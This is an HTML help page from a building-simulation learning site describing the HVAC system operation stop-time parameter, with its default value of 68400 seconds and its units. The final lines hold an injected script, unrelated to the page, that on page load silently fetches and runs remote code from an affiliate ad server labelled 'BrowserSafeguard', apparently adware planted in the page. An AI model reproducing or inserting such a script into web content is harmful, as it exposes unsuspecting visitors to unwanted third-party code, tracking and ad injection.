﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>HVAC SYSTEM OPERATION STOP TIME</h1>
<h3>Associated System: Simulation</h3>
<div class="graphic"> <img src="../HVAC AHU & Ducts/HVACFan.png" alt=""/ ></div>    
<p>This parameter assigns a regular time for the HVAC System to stop operating.The stop-time is determined by the typical end of occupancy of a building (when the majority of the occupants leave the building for the day.) Often, an over-ride will be available in the case occupants are present outside of the typical occupant schedule (ie. evening hours or weekends)</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>The operation stop-time will determine if the HVAC system is efficiently addressing the needs of the occupants. If the stop-time is too early, the HVAC system will stop operating though occupants still require air conditioning . On the other hand, excessively late settings will impact the total energy consumption with unnecessary operation.</p>      
<h4>The value of this variable can not be adjusted during simulation run-time. It may be adjusted before or after a simulation.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> 68400</li>
<li><label>Minimum:</label> </li>
<li><label>Maximum:</label> </li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> second</li>
<li><label>SI Units:</label> second</li>      </ul>
<h2>Related Items: </h2>
<ul>HVAC system operation start time</ul>
<h2>Links:</h2>
<ul>
<li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
